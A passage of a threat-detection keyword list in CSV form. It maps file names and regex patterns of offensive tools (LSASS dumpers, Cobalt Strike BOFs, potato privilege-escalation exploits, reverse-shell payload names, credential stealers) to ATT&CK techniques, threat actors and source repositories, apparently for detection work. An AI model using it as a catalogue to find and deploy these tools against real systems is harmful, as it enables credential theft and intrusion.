Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*AndrewSpecial.exe*",".{0,1000}AndrewSpecial\.exe.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*AndrewSpecial-master*",".{0,1000}AndrewSpecial\-master.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","381","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z" "*android/meterpreter/reverse_tcp*",".{0,1000}android\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*androidbackup2john.py*",".{0,1000}androidbackup2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*androidfde2john.py*",".{0,1000}androidfde2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*AnErrupTion/LoGiC.NET*",".{0,1000}AnErrupTion\/LoGiC\.NET.{0,1000}","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","5","6","506","78","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z" "*Anevicon*",".{0,1000}Anevicon.{0,1000}","offensive_tool_keyword","Anevicon","Attack simulation: Anevicon is a high-performance traffic generator. designed to be as convenient and reliable as it is possible. It sends numerous UDP-packets to a victim. thereby simulating an activity that can be produced by your end users or a group of hackers.","T1498 - T1497 - T1496","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/rozgo/anevicon","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ANGRYPUPPY2.cna*",".{0,1000}ANGRYPUPPY2\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Bloodhound Attack Path Automation in CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/vysecurity/ANGRYPUPPY","1","1","N/A","10","10","306","84","2020-04-26T17:35:31Z","2017-07-11T14:18:07Z" "*anonsurf.py*",".{0,1000}anonsurf\.py.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","42797","4691","2024-04-30T19:30:47Z","2020-04-11T09:21:31Z" "*ansible2john.py*",".{0,1000}ansible2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*anthemtotheego/Detect-Hooks*",".{0,1000}anthemtotheego\/Detect\-Hooks.{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","10","10","147","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z" "*anthemtotheego/SharpSploitConsole*",".{0,1000}anthemtotheego\/SharpSploitConsole.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","1","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*antirez/hping*",".{0,1000}antirez\/hping.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","1","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "*AntivirusBypass.psm1*",".{0,1000}AntivirusBypass\.psm1.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*antiword FUZZ*",".{0,1000}antiword\sFUZZ.{0,1000}","offensive_tool_keyword","litefuzz","A multi-platform fuzzer for poking at userland binaries and servers","T1587.004","TA0009","N/A","N/A","Exploitation tools","https://github.com/sec-tools/litefuzz","1","0","N/A","7","1","63","11","2023-07-16T00:15:41Z","2021-09-17T14:40:07Z" "*antonioCoco/ConPtyShell*",".{0,1000}antonioCoco\/ConPtyShell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*antonioCoco/JuicyPotatoNG*",".{0,1000}antonioCoco\/JuicyPotatoNG.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","1","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*antonioCoco/RemotePotato0*",".{0,1000}antonioCoco\/RemotePotato0.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*antonioCoco/RoguePotato*",".{0,1000}antonioCoco\/RoguePotato.{0,1000}","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","1","N/A","10","10","960","122","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" "*antonioCoco/RogueWinRM*",".{0,1000}antonioCoco\/RogueWinRM.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","1","N/A","10","7","633","101","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z" "*antonioCoco/RunasCs*",".{0,1000}antonioCoco\/RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","1","N/A","N/A","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*antonioCoco/RunasCs*",".{0,1000}antonioCoco\/RunasCs.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs/","1","1","N/A","6","9","872","117","2023-05-20T01:19:52Z","2019-08-08T20:18:18Z" "*antonioCoco/SspiUacBypass*",".{0,1000}antonioCoco\/SspiUacBypass.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","1","N/A","10","4","322","47","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" "*anypotato.exe*",".{0,1000}anypotato\.exe.{0,1000}","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","361","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" "*aodkkagnadcbobfpggfnjeongemjbjca*",".{0,1000}aodkkagnadcbobfpggfnjeongemjbjca.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*AoratosWin*.zip*",".{0,1000}AoratosWin.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin.csproj*",".{0,1000}AoratosWin\.csproj.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin.exe*",".{0,1000}AoratosWin\.exe.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin.git*",".{0,1000}AoratosWin\.git.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin.sln*",".{0,1000}AoratosWin\.sln.{0,1000}","offensive_tool_keyword","AoratosWin","AoratosWin A tool that removes traces of executed applications on Windows OS","T1070 - T1564","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*AoratosWin_*.zip*",".{0,1000}AoratosWin_.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*apache_felix_remote_shell*",".{0,1000}apache_felix_remote_shell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*APC_Ijnect_Load.nim*",".{0,1000}APC_Ijnect_Load\.nim.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","10","10","594","111","2023-12-28T15:23:19Z","2021-01-19T15:57:01Z" "*apex2john.py*",".{0,1000}apex2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*apfs_encrypted_volume_passwd.md*",".{0,1000}apfs_encrypted_volume_passwd\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*APIHookInjectorBin.exe*",".{0,1000}APIHookInjectorBin\.exe.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.log*",".{0,1000}APIHookInjectorBin\.log.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.pdb*",".{0,1000}APIHookInjectorBin\.pdb.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*APIHookInjectorBin.sln*",".{0,1000}APIHookInjectorBin\.sln.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","3","222","35","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" "*apokryptein/secinject*",".{0,1000}apokryptein\/secinject.{0,1000}","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","1","N/A","10","10","84","22","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*apop2john.py*",".{0,1000}apop2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*app.config['graph_spy_db_folder']*",".{0,1000}app\.config\[\'graph_spy_db_folder\'\].{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*app.config['graph_spy_db_path']*",".{0,1000}app\.config\[\'graph_spy_db_path\'\].{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1190 - T1133 - T1071 - T1082 - T1566.002","TA0001 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/RedByte1337/GraphSpy","1","0","N/A","7","4","346","39","2024-04-17T19:18:08Z","2024-02-07T19:47:15Z" "*app.pentest-tools.com*",".{0,1000}app\.pentest\-tools\.com.{0,1000}","offensive_tool_keyword","pentest-tools.com","site often consulted by pentester","T1596 - T1592","TA0043","N/A","N/A","Reconnaissance","https://pentest-tools.com","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*app/dllproxy.nim*",".{0,1000}app\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","0","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*app/dllproxy.nim*",".{0,1000}app\/dllproxy\.nim.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","N/A","9","1","11","0","2024-03-22T10:29:56Z","2024-03-15T15:15:45Z" "*appdata*\Windows:svchost.exe*",".{0,1000}appdata.{0,1000}\\Windows\:svchost\.exe.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*appdata*\Windows:winrm.vbs*",".{0,1000}appdata.{0,1000}\\Windows\:winrm\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*AppData\Roaming\(s)AINT*",".{0,1000}AppData\\Roaming\\\(s\)AINT.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*apple_ios/aarch64/meterpreter_reverse_tcp*",".{0,1000}apple_ios\/aarch64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*applenotes2john.py*",".{0,1000}applenotes2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Applet_ReverseTCP.jar*",".{0,1000}Applet_ReverseTCP\.jar.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*Application.Lazagne.H*",".{0,1000}Application\.Lazagne\.H.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*AppLocker Bypass PowerShell Runspace.csproj*",".{0,1000}AppLocker\sBypass\sPowerShell\sRunspace\.csproj.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*applocker_enum*",".{0,1000}applocker_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*applocker-enumerator*",".{0,1000}applocker\-enumerator.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","10","10","247","48","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z" "*apt install *tor2web*",".{0,1000}apt\sinstall\s.{0,1000}tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" 